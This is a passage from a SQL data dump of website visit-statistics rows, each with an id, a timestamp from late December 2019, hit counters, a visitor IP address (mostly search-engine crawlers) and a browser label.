1,1,0,0,'94.153.100.246','other'),(471189,1577303251,1,1,0,0,'66.249.64.28','chrome'),(471190,1577303468,1,1,0,0,'207.46.13.59','other'),(471191,1577303535,1,1,0,0,'34.219.195.247','chrome'),(471192,1577303562,1,1,0,0,'178.154.171.134','other'),(471193,1577303630,2,2,0,0,'66.249.64.27','chrome'),(471194,1577303671,1,1,0,0,'66.249.64.26','chrome'),(471195,1577304163,1,1,0,0,'207.46.13.233','other'),(471196,1577304874,1,1,0,0,'178.154.171.134','other'),(471197,1577304971,1,1,0,0,'66.249.64.28','chrome'),(471198,1577305874,1,1,0,0,'95.134.221.51','chrome'),(471199,1577306008,1,1,0,0,'178.154.171.127','other'),(471200,1577306500,11,11,0,0,'5.9.155.226','other'),(471201,1577306751,1,1,0,0,'31.13.127.12','other'),(471202,1577306753,1,1,0,0,'31.13.127.13','other'),(471203,1577307183,1,1,0,0,'178.154.171.134','other'),(471204,1577307261,1,1,0,0,'207.46.13.89','other'),(471205,1577307273,1,1,0,0,'66.249.64.28','chrome'),(471206,1577307329,3,3,0,0,'66.249.64.26','chrome'),(471207,1577307943,2,2,0,0,'207.46.13.59','other'),(471208,1577307968,1,1,0,0,'95.28.93.27','msie'),(471209,1577308098,1,1,0,0,'8.29.198.27','other'),(471210,1577308439,1,1,0,0,'207.46.13.89','other'),(471211,1577308929,1,1,0,0,'8.29.198.26','other'),(471212,1577309475,1,1,0,0,'207.46.13.89','other'),(471213,1577309524,1,1,0,0,'95.28.93.27','chrome'),(471214,1577309595,2,2,0,0,'178.154.171.127','other'),(471215,1577309646,1,1,0,0,'178.154.171.134','other'),(471216,1577309833,2,2,0,0,'207.46.13.59','other'),(471217,1577310194,1,1,0,0,'95.91.74.11','other'),(471218,1577311173,1,0,1,0,'157.55.39.163',''),(471219,1577311310,1,1,0,0,'66.249.64.27','chrome'),(471220,1577311587,2,1,1,0,'157.55.39.163',''),(471221,1577312028,2,2,0,0,'178.154.171.134','other'),(471222,1577312144,2,2,0,0,'66.249.64.28','chrome'),(471223,1577312398,1,1,0,0,'157.55.39.163','other'),(471224,1577312808,1,1,0,0,'91.196.178.184','chrome'),(471225,1577312817,1,1,0,0,'178.154.171.134','chrome'),(471226,1577313066,1,1,0,0,'207.46.13.59','other'),(471227,1577313693,1,1,0,0,'157.55.39.163','other'),(471228,1577314593,1,1,0,0,'66.249.64.27','chrome'),(471229,1577314706,1,1,0,0,'66.249.70.33','chrome'),(471230,1577315895,1,1,0,0,'91.196.178.184','chrome'),(471231,1577315906,1,1,0,0,'178.154.171.127','other'),(471232,1577315985,1,1,0,0,'66.249.64.28','chrome'),(471233,1577316860,1,1,0,0,'141.8.132.37','other'),(471234,1577317898,2,2,0,0,'66.249.64.27','chrome'),(471235,1577318108,1,1,0,0,'66.249.64.28','chrome'),(471236,1577318216,1,1,0,0,'66.249.64.26','chrome'),(471237,1577318936,1,1,0,0,'8.29.198.26','other'),(471238,1577319465,1,1,0,0,'66.249.64.28','chrome'),(471239,1577319489,1,1,0,0,'207.46.13.89','other'),(471240,1577319523,1,1,0,0,'66.249.64.27','chrome'),(471241,1577319782,1,1,0,0,'8.29.198.25','other'),(471242,1577320303,1,1,0,0,'178.154.171.134','other'),(471243,1577320875,1,1,0,0,'37.9.113.10','other'),(471244,1577321135,1,1,0,0,'157.55.39.163','other'),(471245,1577321714,1,1,0,0,'62.205.134.182','other'),(471246,1577321781,1,1,0,0,'66.249.64.26','chrome'),(471247,1577321840,1,1,0,0,'66.249.70.36','chrome'),(471248,1577323186,1,1,0,0,'207.46.13.89','other'),(471249,1577323291,1,1,0,0,'66.249.64.28','chrome'),(471250,1577323715,2,2,0,0,'157.55.39.163','other'),(471251,1577324816,2,2,0,0,'178.154.171.134','other'),(471252,1577325041,1,1,0,0,'207.46.13.59','other'),(471253,1577326191,1,1,0,0,'207.46.13.59','other'),(471254,1577326199,1,1,0,0,'178.154.171.134','other'),(471255,1577326968,1,1,0,0,'141.8.183.73','other'),(471256,1577327137,1,1,0,0,'66.249.70.62','chrome'),(471257,1577327254,1,1,0,0,'66.249.70.36','chrome'),(471258,1577328028,1,1,0,0,'207.46.13.89','other'),(471259,1577328100,1,1,0,0,'157.55.39.163','other'),(471260,1577328103,4,4,0,0,'66.249.64.26','chrome'),(471261,1577329667,1,1,0,0,'35.160.139.75','chrome'),(471262,1577329670,1,1,0,0,'35.162.70.167','other'),(471263,1577329803,1,1,0,0,'8.29.198.27','other'),(471264,1577330623,1,1,0,0,'8.29.198.26','other'),(471265,1577331244,1,1,0,0,'178.154.171.127','other'),(471266,1577332183,1,1,0,0,'66.249.64.28','chrome'),(471267,1577332679,1,1,0,0,'66.249.64.27','chrome'),(471268,1577332688,2,2,0,0,'66.249.64.26','chrome'),(471269,1577332835,1,1,0,0,'178.154.171.134','other'),(471270,1577333774,1,1,0,0,'178.154.171.127','other'),(471271,1577333835,3,3,0,0,'66.249.64.27','chrome'),(471272,1577334200,1,1,0,0,'66.249.64.26','chrome'),(471273,1577334217,2,2,0,0,'178.154.171.134','other'),(471274,1577334804,1,1,0,0,'91.196.178.130','firefox'),(471275,1577334919,2,0,2,0,'207.46.13.89',''),(471276,1577335489,1,1,0,0,'66.249.70.33','chrome'),(471277,1577335673,2,2,0,0,'178.154.171.134','other'),(471278,1577335784,2,1,1,0,'207.46.13.59',''),(471279,1577336523,1,1,0,0,'13.66.139.0','other'),(471280,1577336623,1,1,0,0,'13.231.5.61','chrome'),(471281,1577336767,2,2,0,0,'66.249.64.26','chrome'),(471282,1577336844,2,2,0,0,'178.154.171.134','other'),(471283,1577337082,1,0,1,0,'207.46.13.59',''),(471284,1577337476,7,7,0,0,'5.9.70.72','other'),(471285,1577337736,1,1,0,0,'207.46.13.89','other'),(471286,1577338839,1,1,0,0,'95.135.113.171','chrome'),(471287,1577338856,1,1,0,0,'62.205.134.182','other'),(471288,1577338997,1,1,0,0,'66.249.64.28','chrome'),(471289,1577339068,2,2,0,0,'178.154.171.134','other'),(471290,1577339096,1,1,0,0,'178.154.171.127','other'),(471291,1577340209,2,2,0,0,'178.154.171.134','other'),(471292,1577340650,1,1,0,0,'8.29.198.25','other'),(471293,1577340776,1,1,0,0,'207.46.13.59','other'),(471294,1577340942,1,1,0,0,'51.15.215.86','chrome'),(471295,1577341162,2,2,0,0,'66.249.64.27','chrome'),(471296,1577341465,1,1,0,0,'8.29.198.26','other'),(471297,1577341540,1,1,0,0,'178.154.171.134','other'),(471298,1577341818,1,1,0,0,'66.249.64.28','chrome'),(471299,1577342784,2,2,0,0,'66.249.64.28','chrome'),(471300,1577342999,1,1,0,0,'66.249.64.27','chrome'),(471301,1577343265,1,1,0,0,'91.122.30.68','chrome'),(471302,1577345056,1,1,0,0,'66.249.64.27','chrome'),(471303,1577345210,1,1,0,0,'66.249.70.62','chrome'),(471304,1577345310,1,1,0,0,'66.249.64.28','chrome'),(471305,1577345935,1,1,0,0,'95.132.249.38','chrome'),(471306,1577346183,1,1,0,0,'178.154.171.134','other'),(471307,1577346555,1,1,0,0,'91.196.178.90','chrome'),(471308,1577346859,1,1,0,0,'178.154.171.127','other'),(471309,1577347178,1,1,0,0,'66.249.64.28','chrome'),(471310,1577347365,1,1,0,0,'66.249.64.27','chrome'),(471311,1577347643,1,1,0,0,'5.45.207.65','other'),(471312,1577347938,1,1,0,0,'207.46.13.59','other'),(471313,1577348314,1,1,0,0,'66.249.70.62','chrome'),(471314,1577348449,1,1,0,0,'66.249.64.27','chrome'),(471315,1577350628,1,1,0,0,'66.249.64.28','chrome'),(471316,1577351070,1,1,0,0,'66.249.64.27','chrome'),(471317,1577351092,2,2,0,0,'207.46.13.59','other'),(471318,1577351334,2,2,0,0,'157.55.39.248','other'),(471319,1577351486,2,2,0,0,'8.29.198.27','other'),(471320,1577352893,1,1,0,0,'91.196.177.46','firefox'),(471321,1577353428,3,3,0,0,'157.55.39.163','other'),(471322,1577353965,2,2,0,0,'66.249.64.27','chrome'),(471323,1577354055,1,1,0,0,'91.196.178.187','chrome'),(471324,1577354658,2,2,0,0,'66.249.64.28','chrome'),(471325,1577354972,1,1,0,0,'34.234.208.142','chrome'),(471326,1577355622,1,1,0,0,'66.249.70.36','chrome'),(471327,1577355630,2,2,0,0,'207.46.13.59','other'),(471328,1577355905,1,1,0,0,'91.196.178.71','chrome'),(471329,1577356287,1,1,0,0,'91.196.178.187','chrome'),(471330,1577356574,1,1,0,0,'66.249.64.28','chrome'),(471331,1577356577,2,2,0,0,'66.249.64.27','chrome'),(471332,1577357030,1,1,0,0,'157.55.39.163','other'),(471333,1577357201,1,1,0,0,'37.147.225.102','msie'),(471334,1577357300,1,1,0,0,'66.249.64.26','chrome'),(471335,1577358030,1,1,0,0,'157.55.39.163','other'),(471336,1577358226,1,1,0,0,'207.46.13.59','other'),(471337,1577358673,2,2,0,0,'157.55.39.248','other'),(471338,1577358967,1,1,0,0,'94.23.58.212','firefox'),(471339,1577359035,1,1,0,0,'109.74.154.72','chrome'),(471340,1577359337,1,1,0,0,'66.249.70.36','chrome'),(471341,1577359506,1,1,0,0,'66.249.64.26','chrome'),(471342,1577360184,3,3,0,0,'157.55.39.163','other'),(471343,1577360390,1,1,0,0,'66.249.64.28','chrome'),(471344,1577360862,1,1,0,0,'207.46.13.59','other'),(471345,1577360909,1,1,0,0,'157.55.39.248','other'),(471346,1577361238,1,1,0,0,'66.249.64.26','chrome'),(471347,1577361853,1,1,0,0,'207.46.13.89','other'),(471348,1577362233,1,1,0,0,'178.154.171.134','other'),(471349,1577362347,1,1,0,0,'8.29.198.26','other'),(471350,1577363063,1,1,0,0,'193.22.84.16','firefox'),(471351,1577363167,1,1,0,0,'8.29.198.27','other'),(471352,1577363364,1,1,0,0,'157.55.39.248','other'),(471353,1577363459,1,1,0,0,'178.154.171.127','other'),(471354,1577363467,1,1,0,0,'66.249.64.27','chrome'),(471355,1577363655,1,1,0,0,'91.196.178.90','chrome'),(471356,1577363685,1,1,0,0,'92.112.125.96','chrome'),(471357,1577364021,1,1,0,0,'66.249.64.26','chrome'),(471358,1577364338,1,1,0,0,'207.46.13.89','other'),(471359,1577364557,1,1,0,0,'157.55.39.248','other'),(471360,1577364893,1,1,0,0,'92.112.125.96','chrome'),(471361,1577364916,2,2,0,0,'207.46.13.59','other'),(471362,1577365172,1,1,0,0,'31.13.127.22','other'),(471363,1577365173,1,1,0,0,'31.13.127.18','other'),(471364,1577365298,1,1,0,0,'66.249.64.26','chrome'),(471365,1577365560,1,1,0,0,'178.154.171.134','other'),(471366,1577365923,1,1,0,0,'159.224.158.181','chrome'),(471367,1577366352,3,3,0,0,'66.249.64.28','chrome'),(471368,1577366454,1,1,0,0,'157.55.39.163','other'),(471369,1577366774,1,1,0,0,'95.108.181.104','other'),(471370,1577366831,1,1,0,0,'91.196.178.162','chrome'),(471371,1577367343,1,1,0,0,'66.249.64.28','chrome'),(471372,1577367494,1,1,0,0,'207.46.13.89','other'),(471373,1577368594,2,2,0,0,'66.249.64.26','chrome'),(471374,1577368825,1,1,0,0,'157.55.39.248','other'),(471375,1577369003,1,1,0,0,'142.93.174.205','other'),(471376,1577369123,1,1,0,0,'141.8.183.73','other'),(471377,1577369234,1,1,0,0,'66.249.64.27','chrome'),(471378,1577369578,1,1,0,0,'95.164.172.50','chrome'),(471379,1577369650,1,1,0,0,'66.249.70.36','chrome'),(471380,1577370317,1,1,0,0,'207.46.13.59','other'),(471381,1577370860,1,1,0,0,'178.154.171.134','other'),(471382,1577371242,1,1,0,0,'66.249.64.26','chrome'),(471383,1577371292,1,1,0,0,'195.234.215.67','other'),(471384,1577372399,1,1,0,0,'157.55.39.248','other'),(471385,1577372932,1,1,0,0,'178.154.171.127','other'),(471386,1577373197,1,1,0,0,'8.29.198.27','other'),(471387,1577373351,1,1,0,0,'66.249.70.33','chrome'),(471388,1577374014,1,1,0,0,'8.29.198.25','other'),(471389,1577374279,1,1,0,0,'178.154.171.134','other'),(471390,1577374996,1,1,0,0,'207.46.13.89','other'),(471391,1577375226,1,1,0,0,'66.249.64.26','chrome'),(471392,1577375524,3,3,0,0,'66.249.64.28','chrome'),(471393,1577376000,1,1,0,0,'66.249.70.33','chrome'),(471394,1577376109,1,1,0,0,'207.46.13.89','other'),(471395,1577376814,1,1,0,0,'66.249.64.28','chrome'),(471396,1577376893,1,1,0,0,'91.196.178.187','chrome'),(471397,1577376982,1,1,0,0,'178.154.171.127','other'),(471398,1577377215,2,2,0,0,'157.55.39.248','other'),(471399,1577377325,1,1,0,0,'207.46.13.89','other'),(471400,1577377716,1,1,0,0,'91.196.178.84','firefox'),(471401,1577378031,1,1,0,0,'66.249.70.62','chrome'),(471402,1577378130,1,1,0,0,'94.62.219.55','msie'),(471403,1577378132,1,1,0,0,'178.154.171.134','other'),(471404,1577378218,1,1,0,0,'95.84.160.140','chrome'),(471405,1577378397,3,3,0,0,'66.249.64.27','chrome'),(471406,1577378647,1,1,0,0,'66.249.70.33','chrome'),(471407,1577378688,1,1,0,0,'207.46.13.89','other'),(471408,1577378856,2,2,0,0,'207.46.13.59','other'),(471409,1577379228,1,1,0,0,'91.196.178.187','chrome'),(471410,1577379322,4,4,0,0,'178.154.171.134','other'),(471411,1577380013,1,1,0,0,'46.211.115.142','chrome'),(471412,1577380286,1,1,0,0,'66.249.64.28','chrome'),(471413,1577381293,1,1,0,0,'157.55.39.248','other'),(471414,1577381507,1,0,1,0,'207.46.13.59',''),(471415,1577381620,1,1,0,0,'141.8.183.73','other'),(471416,1577381697,1,1,0,0,'66.249.64.27','chrome'),(471417,1577382188,1,1,0,0,'66.249.70.36','chrome'),(471418,1577382452,2,2,0,0,'207.46.13.59','other'),(471419,1577382560,1,1,0,0,'66.249.64.26','chrome'),(471421,1577382909,1,1,0,0,'66.249.64.27','chrome'),(471422,1577383034,1,1,0,0,'31.13.127.4','other'),(471423,1577383035,1,1,0,0,'31.13.127.7','other'),(471424,1577383268,1,1,0,0,'157.55.39.248','other'),(471425,1577383774,1,1,0,0,'66.249.70.62','chrome'),(471426,1577383896,1,1,0,0,'178.154.171.134','other'),(471427,1577383971,1,1,0,0,'207.46.13.247','other'),(471428,1577384042,2,2,0,0,'8.29.198.26','other'),(471429,1577384915,1,1,0,0,'66.249.64.27','chrome'),(471430,1577384989,2,2,0,0,'178.154.171.134','other'),(471431,1577385091,1,1,0,0,'91.209.11.236','other'),(471432,1577385811,1,1,0,0,'157.55.39.248','other'),(471433,1577386591,1,1,0,0,'207.46.13.247','other'),(471434,1577386624,2,2,0,0,'213.179.252.212','chrome'),(471435,1577386819,1,1,0,0,'66.249.64.27','chrome'),(471436,1577386895,1,1,0,0,'157.55.39.248','other'),(471437,1577387729,1,1,0,0,'207.46.13.59','other'),(471438,1577388107,1,1,0,0,'207.46.13.247','other'),(471439,1577388621,1,1,0,0,'66.249.64.28','chrome'),(471440,1577389139,1,1,0,0,'207.46.13.46','other'),(471441,1577389301,1,1,0,0,'207.46.13.66','other'),(471442,1577389436,2,2,0,0,'207.46.13.59','other'),(471443,1577390011,1,1,0,0,'207.46.13.247','other'),(471444,1577391590,1,1,0,0,'66.249.64.27','chrome'),(471445,1577391614,3,3,0,0,'66.249.64.26','chrome'),(471446,1577394163,1,1,0,0,'66.249.70.36','chrome'),(471447,1577394822,1,1,0,0,'207.46.13.59','other'),(471448,1577394890,2,2,0,0,'8.29.198.25','other'),(471449,1577395371,1,1,0,0,'66.249.70.36','chrome'),(471450,1577396427,1,1,0,0,'207.46.13.247','other'),(471451,1577396748,2,2,0,0,'178.154.171.134','other'),(471452,1577396750,1,1,0,0,'66.249.64.27','chrome'),(471453,1577397516,1,1,0,0,'77.47.228.29','chrome'),(471454,1577398496,1,1,0,0,'68.108.116.199','other'),(471455,1577399273,2,2,0,0,'178.154.171.134','other'),(471456,1577399607,2,2,0,0,'207.46.13.247','other'),(471457,1577403450,1,1,0,0,'66.249.64.27','chrome'),(471458,1577403477,1,1,0,0,'207.46.13.247','other'),(471459,1577403709,1,1,0,0,'66.249.70.62','chrome'),(471460,1577403836,1,1,0,0,'66.249.70.36','chrome'),(471461,1577404048,1,1,0,0,'207.46.13.46','other'),(471462,1577404140,1,1,0,0,'66.249.64.28','chrome'),(471463,1577404215,1,1,0,0,'157.55.39.222','other'),(471464,1577404662,1,1,0,0,'37.9.113.33','other'),(471465,1577405753,1,1,0,0,'8.29.198.25','other'),(471466,1577406050,1,1,0,0,'66.249.64.28','chrome'),(471467,1577406233,1,1,0,0,'207.46.13.46','other'),(471468,1577406571,1,1,0,0,'8.29.198.26','other'),(471469,1577407103,1,1,0,0,'66.249.70.62','chrome'),(471470,1577407471,3,3,0,0,'157.55.39.222','other'),(471471,1577408114,1,1,0,0,'62.205.134.182','other'),(471472,1577408272,1,1,0,0,'66.249.64.27','chrome'),(471473,1577408770,1,1,0,0,'66.249.64.28','chrome'),(471474,1577408926,1,1,0,0,'66.249.70.62','chrome'),(471475,1577409262,1,1,0,0,'8.208.20.89','chrome'),(471476,1577409273,1,1,0,0,'8.208.20.89','firefox'),(471477,1577409444,1,1,0,0,'157.55.39.179','other'),(471478,1577409577,2,2,0,0,'157.55.39.222','other'),(471479,1577410801,2,2,0,0,'66.249.64.27','chrome'),(471480,1577411765,1,1,0,0,'66.249.64.27','chrome'),(471481,1577413022,1,1,0,0,'157.55.39.179','other'),(471482,1577413257,1,1,0,0,'66.249.64.28','chrome'),(471483,1577413628,1,1,0,0,'157.55.39.222','other'),(471484,1577414365,2,2,0,0,'178.154.171.134','other'),(471485,1577415465,1,1,0,0,'157.55.39.222','other'),(471486,1577415484,1,1,0,0,'66.249.64.28','chrome'),(471487,1577415616,2,2,0,0,'66.249.64.27','chrome'),(471488,1577415844,1,1,0,0,'17.58.101.25','other'),(471489,1577416027,2,2,0,0,'66.249.64.26','chrome'),(471490,1577416476,1,1,0,0,'66.249.70.36','chrome'),(471491,1577416594,1,1,0,0,'8.29.198.26','other'),(471492,1577417106,1,1,0,0,'66.249.70.33','chrome'),(471493,1577417239,2,2,0,0,'66.249.64.27','chrome'),(471494,1577417421,1,1,0,0,'8.29.198.25','other'),(471495,1577417804,1,1,0,0,'66.249.64.28','chrome'),(471496,1577418209,1,1,0,0,'178.154.171.134','other'),(471497,1577418276,1,1,0,0,'66.249.64.26','chrome'),(471498,1577418867,1,1,0,0,'157.55.39.222','other'),(471499,1577419336,2,2,0,0,'66.249.64.26','chrome'),(471500,1577419409,3,3,0,0,'66.249.64.27','chrome'),(471501,1577419692,1,1,0,0,'66.249.70.62','chrome'),(471502,1577421070,1,1,0,0,'207.46.13.161','other'),(471503,1577421134,1,1,0,0,'178.154.171.134','other'),(471504,1577421269,1,1,0,0,'107.21.1.8','other'),(471505,1577421271,1,1,0,0,'54.208.102.37','other'),(471506,1577422121,3,3,0,0,'66.249.64.26','chrome'),(471507,1577422406,4,4,0,0,'66.249.64.27','chrome'),(471508,1577422698,1,1,0,0,'66.249.64.28','chrome'),(471509,1577422777,1,1,0,0,'34.209.132.68','chrome'),(471510,1577422781,1,1,0,0,'35.162.70.167','other'),(471511,1577422902,1,1,0,0,'157.55.39.222','other'),(471512,1577423373,1,1,0,0,'66.249.64.27','chrome'),(471513,1577423377,1,1,0,0,'66.249.64.26','chrome'),(471514,1577423764,1,1,0,0,'157.55.39.179','other'),(471515,1577424371,2,2,0,0,'66.249.64.28','chrome'),(471516,1577424457,3,3,0,0,'176.103.56.254','firefox'),(471517,1577424459,1,1,0,0,'176.103.56.254','chrome'),(471518,1577424768,1,1,0,0,'66.249.64.26','chrome'),(471519,1577425062,1,1,0,0,'209.17.97.82','other'),(471520,1577425063,1,1,0,0,'66.249.64.27','chrome'),(471521,1577425297,1,1,0,0,'62.205.134.182','other'),(471522,1577426464,1,1,0,0,'157.55.39.179','other'),(471523,1577427009,1,1,0,0,'157.55.39.222','other'),(471524,1577427442,2,2,0,0,'8.29.198.26','other'),(471525,1577427773,1,1,0,0,'66.249.64.26','chrome'),(471526,1577427966,1,1,0,0,'157.55.39.222','other'),(471527,1577428198,2,2,0,0,'178.154.171.127','other'),(471528,1577428313,1,1,0,0,'178.154.171.134','other'),(471529,1577428742,1,1,0,0,'66.249.64.28','chrome'),(471530,1577429429,1,1,0,0,'185.135.180.101','chrome'),(471531,1577429459,1,1,0,0,'178.154.171.134','other'),(471532,1577432217,1,1,0,0,'66.249.64.28','chrome'),(471533,1577432249,1,1,0,0,'66.249.64.27','chrome'),(471534,1577433326,3,3,0,0,'91.196.178.90','chrome'),(471535,1577433682,1,1,0,0,'91.196.178.183','chrome'),(471536,1577433832,1,1,0,0,'66.249.64.26','chrome'),(471537,1577433918,1,1,0,0,'66.249.64.27','chrome'),(471538,1577434259,1,1,0,0,'91.196.178.90','chrome'),(471539,1577435136,1,1,0,0,'77.47.228.24','chrome'),(471540,1577435896,1,1,0,0,'66.249.70.33','chrome'),(471541,1577436010,3,3,0,0,'157.55.39.222','other'),(471542,1577436585,1,1,0,0,'66.249.70.62','chrome'),(471543,1577437060,1,1,0,0,'178.154.171.134','other'),(471544,1577437411,2,2,0,0,'66.249.64.26','chrome'),(471545,1577437476,1,1,0,0,'91.196.178.90','chrome'),(471546,1577438138,1,1,0,0,'66.249.70.62','chrome'),(471547,1577438183,2,2,0,0,'66.249.64.28','chrome'),(471548,1577438226,1,1,0,0,'178.154.171.134','other'),(471549,1577438310,2,2,0,0,'8.29.198.26','other'),(471550,1577438484,1,1,0,0,'176.59.21.212','chrome'),(471551,1577438733,6,6,0,0,'66.249.64.26','chrome'),(471552,1577438864,2,2,0,0,'66.249.64.27','chrome'),(471553,1577438910,1,1,0,0,'66.249.70.33','chrome'),(471554,1577439112,2,2,0,0,'207.46.13.83','other'),(471555,1577439150,3,3,0,0,'66.249.64.28','chrome'),(471556,1577439759,3,3,0,0,'66.249.64.26','chrome'),(471557,1577439772,3,3,0,0,'66.249.64.27','chrome'),(471558,1577439856,1,1,0,0,'3.133.119.245','chrome'),(471559,1577440148,2,2,0,0,'91.196.178.90','chrome'),(471560,1577440560,1,1,0,0,'66.249.64.28','chrome'),(471561,1577441351,1,1,0,0,'66.249.64.27','chrome'),(471562,1577441408,2,2,0,0,'157.55.39.222','other'),(471563,1577441719,1,1,0,0,'178.154.171.127','other'),(471564,1577442278,2,2,0,0,'91.196.178.90','chrome'),(471565,1577442852,1,1,0,0,'66.249.64.26','chrome'),(471566,1577443274,1,1,0,0,'66.249.64.27','chrome'),(471567,1577443510,2,2,0,0,'66.249.64.28','chrome'),(471568,1577444025,1,1,0,0,'207.46.13.161','other'),(471569,1577444620,1,1,0,0,'91.196.178.176','chrome'),(471570,1577444781,1,1,0,0,'66.249.64.28','chrome'),(471571,1577445383,1,1,0,0,'178.154.171.134','other'),(471572,1577445502,1,1,0,0,'109.74.154.72','chrome'),(471573,1577445894,1,1,0,0,'66.249.64.27','chrome'),(471574,1577446080,1,1,0,0,'91.196.178.90','chrome'),(471575,1577446196,3,3,0,0,'66.249.64.26','chrome'),(471576,1577447191,1,1,0,0,'207.46.13.83','other'),(471577,1577447200,2,2,0,0,'157.55.39.222','other'),(471578,1577447814,1,1,0,0,'141.8.132.19','other'),(471579,1577447817,1,1,0,0,'141.8.142.2','other'),(471580,1577448072,1,1,0,0,'31.13.115.4','chrome'),(471581,1577448111,1,1,0,0,'193.19.152.78','chrome'),(471582,1577448192,1,1,0,0,'46.211.159.38','chrome'),(471583,1577448491,1,1,0,0,'66.249.64.27','chrome'),(471584,1577448494,1,1,0,0,'66.249.70.62','chrome'),(471585,1577448621,1,1,0,0,'66.249.70.36','chrome'),(471586,1577449043,1,1,0,0,'66.249.64.28','chrome'),(471587,1577449181,1,1,0,0,'8.29.198.26','other'),(471588,1577449334,1,1,0,0,'207.46.13.83','other'),(471589,1577449619,1,1,0,0,'207.46.13.161','other'),(471590,1577449959,1,1,0,0,'8.29.198.27','other'),(471591,1577450002,1,1,0,0,'78.32.253.202','firefox'),(471592,1577450270,1,1,0,0,'157.55.39.179','other'),(471593,1577450274,1,1,0,0,'157.55.39.222','other'),(471594,1577450552,1,1,0,0,'207.46.13.161','other'),(471595,1577450628,1,1,0,0,'193.19.152.78','chrome'),(471596,1577451668,1,1,0,0,'178.154.171.134','other'),(471597,1577451985,1,1,0,0,'66.249.64.26','chrome'),(471598,1577452313,1,1,0,0,'207.46.13.161','other'),(471599,1577452516,1,1,0,0,'66.249.64.28','chrome'),(471600,1577453084,2,2,0,0,'66.249.64.26','chrome'),(471601,1577453181,2,2,0,0,'157.55.39.222','other'),(471602,1577453360,1,0,1,0,'157.55.39.179',''),(471603,1577453496,2,2,0,0,'157.55.39.179','other'),(471604,1577453939,1,1,0,0,'5.45.207.49','other'),(471605,1577454538,1,1,0,0,'207.46.13.161','other'),(471606,1577455233,2,2,0,0,'207.46.13.83','other'),(471607,1577455307,1,1,0,0,'95.108.213.55','other'),(471608,1577455711,1,1,0,0,'178.154.171.134','other'),(471609,1577456301,1,1,0,0,'107.178.194.172','chrome'),(471610,1577456801,1,1,0,0,'66.249.64.27','chrome'),(471611,1577457287,1,1,0,0,'207.46.13.83','other'),(471612,1577457947,1,1,0,0,'178.154.171.127','other'),(471613,1577458236,1,1,0,0,'66.249.64.26','chrome'),(471614,1577458276,1,1,0,0,'157.55.39.179','other'),(471615,1577459023,2,2,0,0,'207.46.13.161','other'),(471616,1577459027,1,1,0,0,'157.55.39.222','other'),(471617,1577459312,3,3,0,0,'207.46.13.83','other'),(471618,1577459362,1,1,0,0,'66.249.64.28','chrome'),(471619,1577460031,1,1,0,0,'8.29.198.25','other'),(471620,1577460050,2,2,0,0,'207.46.13.161','other'),(471621,1577460501,3,3,0,0,'157.55.39.179','other'),(471622,1577460803,1,1,0,0,'8.29.198.27','other'),(471623,1577460806,1,1,0,0,'66.249.64.26','chrome'),(471624,1577461255,1,1,0,0,'66.249.64.27','chrome'),(471625,1577461569,1,1,0,0,'91.196.178.93','firefox'),(471626,1577462056,1,1,0,0,'157.55.39.179','other'),(471627,1577462208,1,1,0,0,'66.249.64.26','chrome'),(471628,1577462531,1,1,0,0,'207.46.13.161','other'),(471629,1577462539,1,1,0,0,'66.249.64.27','chrome'),(471630,1577463046,1,1,0,0,'157.55.39.179','other'),(471631,1577463684,1,1,0,0,'207.46.13.161','other'),(471632,1577464249,1,1,0,0,'213.180.203.124','other'),(471633,1577464283,1,1,0,0,'66.249.64.27','chrome'),(471634,1577464469,1,1,0,0,'66.249.64.28','chrome'),(471635,1577466026,1,1,0,0,'157.55.39.179','other'),(471636,1577467106,1,1,0,0,'178.154.171.134','other'),(471637,1577467288,1,1,0,0,'66.249.64.26','chrome'),(471638,1577470007,2,2,0,0,'66.249.64.27','chrome'),(471639,1577470687,1,1,0,0,'157.55.39.179','other'),(471640,1577470849,1,1,0,0,'46.211.140.42','chrome'),(471641,1577470904,1,1,0,0,'8.29.198.26','other'),(471642,1577470923,1,0,1,0,'66.249.70.33',''),(471643,1577471679,1,1,0,0,'8.29.198.27','other'),(471644,1577471746,1,1,0,0,'46.211.157.146','chrome'),(471645,1577471937,2,2,0,0,'66.249.64.26','chrome'),(471646,1577472735,3,3,0,0,'157.55.39.179','other'),(471647,1577472963,1,1,0,0,'46.211.139.9','chrome'),(471648,1577473150,1,1,0,0,'207.46.13.251','other'),(471649,1577473288,2,2,0,0,'207.46.13.161','other'),(471650,1577473349,1,1,0,0,'66.249.64.26','chrome'),(471651,1577473630,2,2,0,0,'66.249.64.27','chrome'),(471652,1577474328,3,3,0,0,'207.46.13.83','other'),(471653,1577474557,3,3,0,0,'178.154.171.134','other'),(471654,1577474661,1,1,0,0,'178.154.171.127','other'),(471655,1577475241,4,4,0,0,'157.55.39.222','other'),(471656,1577476154,1,1,0,0,'178.154.171.127','other'),(471657,1577476831,1,1,0,0,'207.46.13.83','other'),(471658,1577477153,1,1,0,0,'66.249.64.27','chrome'),(471659,1577477443,1,1,0,0,'178.154.171.134','other'),(471660,1577477901,1,1,0,0,'157.55.39.222','other'),(471661,1577478002,1,1,0,0,'66.249.70.33','chrome'),(471662,1577478454,2,2,0,0,'207.46.13.83','other'),(471663,1577478483,2,2,0,0,'66.249.64.28','chrome'),(471664,1577478528,1,1,0,0,'66.249.64.27','chrome'),(471665,1577478684,1,1,0,0,'178.154.171.134','other'),(471666,1577478953,1,1,0,0,'157.55.39.179','other'),(471667,1577479564,2,2,0,0,'66.249.64.28','chrome'),(471668,1577479834,1,1,0,0,'207.46.13.161','other'),(471669,1577480153,2,2,0,0,'207.46.13.83','other'),(471670,1577480277,1,1,0,0,'178.154.171.134','other'),(471671,1577480540,1,1,0,0,'66.249.64.26','chrome'),(471672,1577481563,1,1,0,0,'185.220.100.254','other'),(471673,1577481566,1,1,0,0,'141.8.183.53','other'),(471674,1577481579,1,1,0,0,'23.129.64.210','chrome'),(471675,1577481581,1,1,0,0,'23.129.64.210','other'),(471676,1577481609,1,1,0,0,'205.185.124.24','other'),(471677,1577481616,1,1,0,0,'205.185.124.24','chrome'),(471678,1577481702,1,1,0,0,'141.8.132.37','other'),(471679,1577481764,2,2,0,0,'8.29.198.26','other'),(471680,1577481851,1,1,0,0,'66.249.64.28','chrome'),(471681,1577482515,1,1,0,0,'66.249.70.33','chrome'),(471682,1577482929,1,1,0,0,'46.211.129.6','chrome'),(471683,1577483337,1,1,0,0,'178.154.171.127','other'),(471684,1577483371,1,1,0,0,'178.154.171.134','other'),(471685,1577483604,1,1,0,0,'66.249.64.27','chrome'),(471686,1577483699,1,1,0,0,'66.249.70.62','chrome'),(471687,1577484779,1,1,0,0,'157.55.39.222','other'),(471688,1577485937,1,1,0,0,'66.249.64.27','chrome'),(471689,1577486952,1,1,0,0,'178.154.171.134','other'),(471690,1577488870,